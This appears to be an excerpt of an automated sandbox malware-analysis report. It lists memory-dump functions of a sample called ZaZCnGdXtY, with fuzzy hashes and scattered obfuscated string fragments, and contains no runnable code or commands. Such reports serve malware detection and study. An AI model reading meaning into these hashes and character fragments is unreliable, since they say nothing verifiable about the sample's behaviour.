                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: /$ R$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${z
                                                                                  • API String ID: 0-2491054771
                                                                                  • Opcode ID: 5b95ffac0a1dd5a041bfad9f37409014922dcc5d4480e79cbf602875bf70d05b
                                                                                  • Instruction ID: 28b1cbfef8f74bc313494bb4ee6ebabc3255479fa402d8374f5079a0b4a3a926
                                                                                  • Opcode Fuzzy Hash: 5b95ffac0a1dd5a041bfad9f37409014922dcc5d4480e79cbf602875bf70d05b
                                                                                  • Instruction Fuzzy Hash: B2629DB0D05669CBEB24CF44C998BDDBBB2BB84309F1081D9C5496B382D7B95AC9CF44
                                                                                  Function 027DFC38 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$O$S$\$s
                                                                                  • API String ID: 0-3854637164
                                                                                  • Opcode ID: bc3f42afd454550bc4ccc942000e40d05f6a40246a6a819d5b27568d2bf33657
                                                                                  • Instruction ID: d8d48cf3921181ad2df8875a731c5519ee0af36364cb57b93fcbd568bea73875
                                                                                  • Opcode Fuzzy Hash: bc3f42afd454550bc4ccc942000e40d05f6a40246a6a819d5b27568d2bf33657
                                                                                  • Instruction Fuzzy Hash: 625182B2901218ABDB11EF94DC48FEEB378EF45714F108599ED09A6240E7745B58CFA2
                                                                                  Function 027ECF38 Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -G$Lf
                                                                                  • API String ID: 0-1055479412
                                                                                  • Opcode ID: e03c8d8316bfe47ef06c5ab438e418e9bb919b8706afd1edd14ceb2c54437cf6
                                                                                  • Instruction ID: 3ddf0635d7b6a4baeaee95c0fee85899fd4323eb59e18d5d40bfac64bcce1aee
                                                                                  • Opcode Fuzzy Hash: e03c8d8316bfe47ef06c5ab438e418e9bb919b8706afd1edd14ceb2c54437cf6
                                                                                  • Instruction Fuzzy Hash: B621EDF6D01218AF8F01DFA9D8419EFBBF9EF48210F14825EE919E7200E7715A058BA1
                                                                                  Function 027CB1E9 Relevance: .1, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2acb6ddaedc435066d5738212dba8848c5cf456ef690a9c6b16ed70a8b05bf6a
                                                                                  • Instruction ID: 49e5dc5fb48e103e8fbe18d3c4dc52a1c8ad01492b322a0f877e11099330444c
                                                                                  • Opcode Fuzzy Hash: 2acb6ddaedc435066d5738212dba8848c5cf456ef690a9c6b16ed70a8b05bf6a
                                                                                  • Instruction Fuzzy Hash: 284130B1D11219AFDB00CFA9CC85AEEBBBCEF49714F10415EFA14E6244D3B19641CBA0
                                                                                  Function 027F0688 Relevance: .1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                                  • Instruction ID: 763c40b13428aae42a0d6bfc1d593eff8e6ee037ec5fd6503f472ba7b615cc22
                                                                                  • Opcode Fuzzy Hash: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                                  • Instruction Fuzzy Hash: 923109B5A04249AFDB14DF98CC41EEFB7F9EF88310F104119F918A7380D674A9118FA1
                                                                                  Function 027F0FC8 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                                  • Instruction ID: 62b1ad1a183e03c1ef28db216bf9cf7e8d7df56f7fc2487aa513a7fa7bc12487
                                                                                  • Opcode Fuzzy Hash: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                                  • Instruction Fuzzy Hash: 1E2139B1A04248AFDB15DF98CC45EEFB7B9EF88710F00810DFD08AB280D674A9158BA1
                                                                                  Function 027DFA78 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                                  • Instruction ID: 4168957c2a8756b0fa72d5e26860cb9285c0207f92735fe07d312687095a1bfd
                                                                                  • Opcode Fuzzy Hash: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                                  • Instruction Fuzzy Hash: 1A11C6B23803047BF7619A159C43FAB335DDB85B10F244405FF08AE2C1D6A4B90147B8
                                                                                  Function 027F0318 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 98bfbf6d6f3978745ddeb3f3fb759692e3ce872b1c554d63368453d2905f381b
                                                                                  • Instruction ID: 650cfa457b564184595ce66ab2c97b7d9db6d5a24d70f454308b7f50b1cc8db8
                                                                                  • Opcode Fuzzy Hash: 98bfbf6d6f3978745ddeb3f3fb759692e3ce872b1c554d63368453d2905f381b
                                                                                  • Instruction Fuzzy Hash: D4116071A14244AFDB11EB98CC45FEF77ADEF89700F40444DFA046B680D77469158BB1
                                                                                  Function 027F0498 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58c97ddedf5ebd353b785620f64a1c794d3b2c3bc08d709393070b982bf91509
                                                                                  • Instruction ID: 5dceea34c5599a779f6f6f33d5dde1065ba70c7328a67e4533e222e4993b295c
                                                                                  • Opcode Fuzzy Hash: 58c97ddedf5ebd353b785620f64a1c794d3b2c3bc08d709393070b982bf91509
                                                                                  • Instruction Fuzzy Hash: C7116071A04294AFDB11EFA4CC45FEF77ADDF85710F00444DFA046B281DA7469158BB1
                                                                                  Function 027EE278 Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 79cfd9c7954e16905ec9f7464743ebb22f0b18b8afb245543d7ca67e01f0d131
                                                                                  • Instruction ID: cf0b139c916aa334fd44ea8a05c56735fc62da2332e94dc86b7795cd86fa2f2d
                                                                                  • Opcode Fuzzy Hash: 79cfd9c7954e16905ec9f7464743ebb22f0b18b8afb245543d7ca67e01f0d131
                                                                                  • Instruction Fuzzy Hash: 64111FB6D0121CAF9B05DFA9D8409EEB7FDEF48210F14456EE919E7200E7705A018FE1
                                                                                  Function 027DFC31 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b836eaca9ddf881c2266d9e59ce918a6b6ace5c2e360bebbbbd0fc7e980b3d1a
                                                                                  • Instruction ID: e9639551dae9d3443285cbc7b15e2ed0b60f1b11f452e8abef8744175eec7eda
                                                                                  • Opcode Fuzzy Hash: b836eaca9ddf881c2266d9e59ce918a6b6ace5c2e360bebbbbd0fc7e980b3d1a
                                                                                  • Instruction Fuzzy Hash: 4E01F762D061046AEF10AAA0DC49FAB737DDB44710F004A95FC09B2140E774A7518BA2
                                                                                  Function 027F1318 Relevance: .0, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction ID: 0bbf13b509f9133d4c5caacfe729ea88130b9bcd6784c3df989f8b501bfdcb05
                                                                                  • Opcode Fuzzy Hash: cf02c4cc9429ea79a6d1e96201238df87769444492242351238c87c23576e22a
                                                                                  • Instruction Fuzzy Hash: DF0184B2214518BBCB44DE99DC81EDB77ADEF8C714F518108BA09A7241D630E8518BA4
                                                                                  Function 027ECEA8 Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7781e152f5116b5491ad1db327c5b8f095cd3bf8fa93476254c5b6e3a3a10b7
                                                                                  • Instruction ID: bae1d808e60f5f635aa67d02ca53cfaec71437c0409f355d23b3027aa020bb7e
                                                                                  • Opcode Fuzzy Hash: d7781e152f5116b5491ad1db327c5b8f095cd3bf8fa93476254c5b6e3a3a10b7
                                                                                  • Instruction Fuzzy Hash: D001D7F2D01229AFDB45DFE8D8409EEBBF9AB18700F14456EE915F2240E77056048FA1
                                                                                  Function 027CB34F Relevance: .0, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5458a291c20a3af9e9ae532c644e0288b42cb6c9a9169dc4310d2c4bebb472d3
                                                                                  • Instruction ID: 20b76de033a432934c88f0663bc5ad25bddbebf9e094ed0da32691c3afb4cb88
                                                                                  • Opcode Fuzzy Hash: 5458a291c20a3af9e9ae532c644e0288b42cb6c9a9169dc4310d2c4bebb472d3
                                                                                  • Instruction Fuzzy Hash: 6EF02BB360421657D7101A7DAC45B9AF79CEB85338F34122AFD1CD6281E731D4118790
                                                                                  Function 027F0598 Relevance: .0, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                                  • Instruction ID: b98a0193b97d979ae90bc4eb11a48b445ec7ccc037da57afcfbb9f5cc884e533
                                                                                  • Opcode Fuzzy Hash: 91ca79ca6e45e0556298b6b80c2212e30eb3465347c09e24b88dc4394c321a2b
                                                                                  • Instruction Fuzzy Hash: 0BF08CB1200218BFCB10DF98DC81EDB77ADEFC8710F108019FA08A7241D630B8118BB1
                                                                                  Function 027CB3C2 Relevance: .0, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                                  • Instruction ID: aca740408b79684eb2a75660b1400b2bfa3e24302724a934db2804d89e6401c8
                                                                                  • Opcode Fuzzy Hash: ca834ee7269fefe24f009e1f20ca268a1d9e23ca6f561b9a94b3f5d4afc9c90b
                                                                                  • Instruction Fuzzy Hash: C3E06837408A2746C3021A786842045F791FA8133A338A31EE86B97241DB32A84986C2
                                                                                  Function 027F1238 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction ID: 90153b0473f8ceae06432c68020921cbc434e27553124723b2c187abab0da777
                                                                                  • Opcode Fuzzy Hash: fc49648c11e90faf33731bc79bc8e8675936d387bbefc8f6442bf02281781b34
                                                                                  • Instruction Fuzzy Hash: 35E09275204204BFD610EE58DC45EDB33ADDFC5710F400418FA08A7281C631BA11CBB5
                                                                                  Function 027DFB98 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                                  • Instruction ID: b0b26f0d6c6898e1d73d3f1254efd4e330ed7fffc2c375b33501f2637d3ba09e
                                                                                  • Opcode Fuzzy Hash: b8b41af344d36c7c1555698fc339d067d4333b6558d8f1d4a9665547b57f4f13
                                                                                  • Instruction Fuzzy Hash: E3F08271815208EBDB14CF74D841BDEBBB4EB04320F2083AEE8299B280D63497508B81
                                                                                  Function 027F3058 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                                  • Instruction ID: 86b347ffc5a73adeaa33d0a5b7966bf4a7929ecdb14c7c9086c85d4047be2cda
                                                                                  • Opcode Fuzzy Hash: 6c0750c0d245d65ab9e5cfdd1849f9dcc19a20d58ecc4520c895b2c54b55376b
                                                                                  • Instruction Fuzzy Hash: 8DE02632F0425433C221258A8C09F9B735ECBC1E60F0801A9FF0C9B300E2B0B90186E0
                                                                                  Function 027F0F38 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction ID: bd92810a91b93d36bd4ae324fd5b33d4d5abf518a82cb7b9417fdd3083d3f4f3
                                                                                  • Opcode Fuzzy Hash: 78e2a7f370486fb8e38ebc04d0bcf967f8016fa95c29a15494aeb31deec0d7bf
                                                                                  • Instruction Fuzzy Hash: BCE0D6362002047BC620AA69CC40FDBB7ACDFC2B11F400818FA08AB282C6B0B8018BB1
                                                                                  Function 027CB3B1 Relevance: .0, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                                  • Instruction ID: 783642aaa6e225f5a376499f618b1efc6ad8721d5774de73790f79ae4aacbf35
                                                                                  • Opcode Fuzzy Hash: 73c404b58772034110a0fe17ca0b05195cbfc4918c76bd3dc70d5080f0d29bcb
                                                                                  • Instruction Fuzzy Hash: 68D0A573414573454715167C2C55444D7C5D28133D37C373AE46DD6291EB21C05A43D0
                                                                                  Function 027DFBF0 Relevance: .0, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 97f3ac0a48ec897062dc0fb3bb2a1d549dcfbe4f789441e559fc9331e0c57e5f
                                                                                  • Instruction ID: 0bb5732293d82fef1054953ecea887d4b019f7f9c8031629eb049c226131282d
                                                                                  • Opcode Fuzzy Hash: 97f3ac0a48ec897062dc0fb3bb2a1d549dcfbe4f789441e559fc9331e0c57e5f
                                                                                  • Instruction Fuzzy Hash: 23E02B36515048AAE701CF70C860FEEB738EB40300F0447E9EC0587500D23A8751C651
                                                                                  Function 027D28A3 Relevance: .0, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f5197b9f4753733361b288f5139756fe0d3e1b7947f54454737712bbb4051830
                                                                                  • Instruction ID: e8c19a1afdec106b908aa76500a11629acbb275011fa6539b851c1d1b5d55bf6
                                                                                  • Opcode Fuzzy Hash: f5197b9f4753733361b288f5139756fe0d3e1b7947f54454737712bbb4051830
                                                                                  • Instruction Fuzzy Hash: 3DB01292B455D6137F3F323A224C45ABE2748D31F07D606A0F84EAF2CFDBA288636541

                                                                                  Non-executed Functions

                                                                                  Function 027D1C58 Relevance: 41.4, Strings: 33, Instructions: 154COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: /$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${
                                                                                  • API String ID: 0-808712017
                                                                                  • Opcode ID: 675b8b416705f6fbc1a036a5d72e4af9b6201caacaeb349fe94eaaf066658d88
                                                                                  • Instruction ID: 2a42437629f950d50cd38afdf1b95b03069a7fdc8ac3f7314cf8db895741ec49
                                                                                  • Opcode Fuzzy Hash: 675b8b416705f6fbc1a036a5d72e4af9b6201caacaeb349fe94eaaf066658d88
                                                                                  • Instruction Fuzzy Hash: 3FC108B0D05669CBEB60CF41C9987DEBBB1BB45308F1085D9C5583B281CBBA1AC9CF95
                                                                                  Function 027CAFCC Relevance: 20.1, Strings: 16, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$c&-n$msmu$qsck$tqmq$umrx$vmsc$vpwm$vpwm
                                                                                  • API String ID: 0-3311200144
                                                                                  • Opcode ID: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                                  • Instruction ID: 38abec255c30477170fab103ce5eb6988a8935884596138a0cd35d61767d3c5e
                                                                                  • Opcode Fuzzy Hash: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                                  • Instruction Fuzzy Hash: AF21E8B4C053989BCF24DF95EA8269CBF30FB05704F20A248D9143F215D7760A85CF9A
                                                                                  Function 027E2A68 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                  • API String ID: 0-392141074
                                                                                  • Opcode ID: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                                  • Instruction ID: 7c08def50d99711999a5751f43a62967663c73e3e5a0b77f24d55aaa45c908f7
                                                                                  • Opcode Fuzzy Hash: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                                  • Instruction Fuzzy Hash: 04711CB1C1421CBADB16DBA4CC45FEEB7BDBF48700F04459DE619A6280EB7157488FA1
                                                                                  Function 027DDB83 Relevance: 10.1, Strings: 8, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                  • API String ID: 0-620024284
                                                                                  • Opcode ID: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                                  • Instruction ID: 59b342c71bb662b8683c2bbca14914e38fa71c893888b5956d0a00a91e8a40ff
                                                                                  • Opcode Fuzzy Hash: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                                  • Instruction Fuzzy Hash: C141A5B5C10258BADB21EBA4CC44FDE737DAF54700F4085DDA60DA7240EBB597498FA1
                                                                                  Function 027E2822 Relevance: 8.9, Strings: 7, Instructions: 174COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4p{+$F$P$T$f$r$x
                                                                                  • API String ID: 0-3640315310
                                                                                  • Opcode ID: c1c30268e2cee8911cb1ae7d7d93b517b15105d1356dc427dfa2868c86aea493
                                                                                  • Instruction ID: 6f4bff885f5185da8d6b72ee6e4c16a4dbbad1bed39d6af51d86d032d5900249
                                                                                  • Opcode Fuzzy Hash: c1c30268e2cee8911cb1ae7d7d93b517b15105d1356dc427dfa2868c86aea493
                                                                                  • Instruction Fuzzy Hash: 0B510370900304AAEF35DB64CC48BEBB7FDBF09704F00465EE909A7181E7B4A648CBA5
                                                                                  Function 027EAC98 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2550000_ZaZCnGdXtY.jbxd
                                                                                  Yara matches
